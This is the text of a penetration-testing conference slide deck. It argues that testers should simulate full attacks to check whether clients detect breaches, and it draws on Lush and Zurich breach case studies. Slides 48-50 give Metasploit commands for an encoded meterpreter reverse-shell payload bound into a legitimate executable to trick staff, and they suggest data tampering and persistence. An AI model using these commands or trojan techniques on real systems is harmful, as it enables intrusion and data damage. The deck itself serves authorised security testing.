3. Introduction / Scope
Are clients aware of attacks happening to
them?
If they are not, how can we help them?
How can we test if they aware of an attack?
4. Remediation of an Attack
Remediation -
Step One -
Fixing the vulnerability that was exploited
Step Two -
Dealing with what happened post exploitation
5. Case Study
Lush.co.uk
They found out at the end of January about the
attack
Stated that the attack started “they think” on
the 4th October
6. Case Study cont.
Zurich UK
Lost 46,000 Customer Records
Found out 1 year later
Cost £2.28 million in fines - Not to mention fixing
7. Case Study cont.
Chain of events -
When did it start?
When did it end?
What information was available to the attacker?
What information was compromised?
Not counting -
How it happened.
How to stop it from happening again.
8. What am I saying?
Yes -
If they knew about the vulnerability in the first place
they could have stopped this from happening.
But they didn’t -
The attack happened and it has cost them money to
not just fix but to the chain of events stuff too.
9. Attacks we see
Layer 8 (Management)
Development Issues
0-Days
Passive Actions / Obfuscation Methods
10. Attacks we see cont.
These attacks are what we are seeing at the
moment.
When we do testing for clients we stop at the
vulnerability.
We stop at the exploit and we do not carry on.
11. Attacks we see cont.
Stopping at the vulnerability means -
The client get to do Step One of remediation
What about Step Two?
12. It is important!!!
Without the proper things in place it can take
a long time to fix this.
Self Detection
Law Enforcement
Public Detection
Regulatory Detection
0 50 100 150 200
13. Why didn’t they know?
There are a lot of things in place at the
moment that help people detect attacks / even
stop them.
IDS / IPS / FW / Logs etc.
Attacks are still occurring and we are still
hearing about them all the time.
14. Why didn’t they know? cont.
Do we test this in our pen test?
How can we test if they are aware of an
attack?
Certainly not by just exploiting the
vulnerability we have to deep dive.
31. IR
Not all companies have IR teams
How long does it take for the attackers trail to
be found?
32. Knowing you have been compromised = good
When and how long for = better
33. Reporting
When it comes to the report attack them with
simulated examples - examples you could
recreate.
Could you kill someone?
Can you steal money?
Can you change / recreate their product?
34. Report cont.
Give a time window / speak to only one person
Document everything you do
Ask them what they saw you do
Compare
35. Did they know?
Did they know you were attacking them
If so did they try to stop you?
If not why not!
36.
37. Noise Levels
Low -
Ninja Hacking Skillz
Medium -
Make a few mistakes that should be detected
High -
Scan them to hell and back
43. Example
So what are we actually talking about?
How can we go about simulating an attack
like what we have just spoken about?
44. Ask and you shall receive
Brief
Discuss options for testing
What is important to them?
45. Seek and you will find
What was important to them?
Are they any exploits / 0-days for that piece of
software?
46. Knock and the door will be
opened
Simply and easily do not give up
There is always going to be some avenue of
attack for this client they may just not know
about it
Look at the following example
47. Attacking Layer 8
Idiots in the company are your first point of
call.
Is the CEO an idiot?
Skype is important to them - attack them with
what is important!
48. Attacking Layer 8 cont.
./msfpayload windows/meterpreter/reverse_tcp
LHOST = x.x.x.x R | ./msfencode -e x86/
shikata_ga_nai -c 5 -t exe -o payload.exe
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
exploit
49. Attacking Layer 8 cont.
Using IExpress you can bind a primary .exe.
and your payload together
Settings available in IExpress
Running that evil .exe (BANG) reverse shell!
50. Do not leave it there!
What did I say at the beginning?
Once you have shell do something with it so
that it actually means something to them
Delete data / change data / get addresses /
create ways to stay there!
51. But WAIT!!! POLITICS!
You cannot just delete data without
permission!
Make sure you find out what you can do!
59. WHAT IS ALL THIS!
By simulating theses attacks the way I am
talking about the client can then see exactly
what they would need to do if it was a real
attack!
60. Future
@sponex and I are creating a website about
this and some guides that link to some good
methodologies out there.
61. Summary
Attack them, don’t pussy foot around!
Find out what they care about.
Make them realise how hard it would be to
fix.
62. :~$ whoami
Director of upSploit
Limited
Soon to be Web
Application Security
Consultant for
Trustwave
British Student
Podcaster